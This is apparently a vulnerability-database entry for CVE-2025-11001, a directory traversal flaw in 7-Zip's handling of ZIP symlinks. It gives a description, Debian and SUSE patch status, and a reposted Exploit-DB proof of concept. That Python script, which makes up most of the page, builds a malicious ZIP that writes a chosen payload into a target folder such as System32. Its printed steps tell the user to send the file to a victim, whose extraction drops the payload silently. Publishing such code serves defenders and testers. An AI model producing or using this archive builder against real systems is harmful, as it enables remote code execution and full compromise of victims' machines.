CVE-2025-11001
Description
7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26753.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
7-Zip 24.00 - Directory Traversal
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions
import struct
import os
import argparse
import sys
def build_zip(target_path, payload_file, output_zip):
if not os.path.isfile(payload_file):
print(f"[-] Payload file not found: {payload_file}")
sys.exit(1)
payload_name = os.path.basename(payload_file)
payload_data = open(payload_file, "rb").read()
target = target_path.replace("\\", "/").strip("/") + "/"
traversal = "../../../../" + target
with open(output_zip, "wb") as f:
offset = 0
symlink_name = "evil.lnk"
symlink_target = traversal.encode() + b"\x00"
symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
symlink_header = struct.pack("<IHHHHHHIIIHH",
0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
0, 0, 0,
len(symlink_name), len(symlink_extra))
f.write(symlink_header)
f.write(symlink_name.encode())
f.write(symlink_extra)
f.write(b"")
symlink_central_offset = offset
offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)
payload_header = struct.pack("<IHHHHHHIIIHH",
0x04034b50, 20, 0x800, 0, 0, 0,
0, len(payload_data), len(payload_data),
len(payload_name), 0)
f.write(payload_header)
f.write(payload_name.encode())
f.write(payload_data)
payload_central_offset = offset
offset += len(payload_header) + len(payload_name) + len(payload_data)
cd_offset = offset
f.write(struct.pack("<IHHHHHHIIIHHHHHII",
0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
0, 0, 0,
len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
f.write(symlink_name.encode())
f.write(symlink_extra)
f.write(struct.pack("<IHHHHHHIIIHHHHHII",
0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
0, len(payload_data), len(payload_data),
len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
f.write(payload_name.encode())
f.write(struct.pack("<IHHHHIIH",
0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))
print(f"[+] Malicious archive created: {output_zip}")
print(f"[+] Target path : {target_path}")
print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)")
print(f"[+] Final write location : {target_path}\\{payload_name}")
print("\n[*] Usage:")
print(" 1. Send the ZIP file to the victim")
print(" 2. Victim must run 7-Zip < 25.00 as Administrator")
print(" 3. Victim opens and extracts the ZIP → payload dropped silently")
print(" 4. Achievement unlocked")
if __name__ == "__main__":
banner = """
CVE-2025-11001 - 7-Zip Directory Traversal PoC
Author: Mohammed Idrees Banyamer (@banyamer_security)
"""
print(banner)
parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
args = parser.parse_args()
build_zip(args.target, args.payload, args.output)OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| — | Affected | — |
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 25.01+dfsg-1~deb13u1 |
| sid | Fixed | 25.00+dfsg-1 |
| forky | Fixed | 25.00+dfsg-1 |
| bullseye | Fixed | 16.02+really25.01+dfsg-0+deb11u1 |
| bookworm | Fixed | 22.01+really25.01+dfsg-0+deb12u1 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.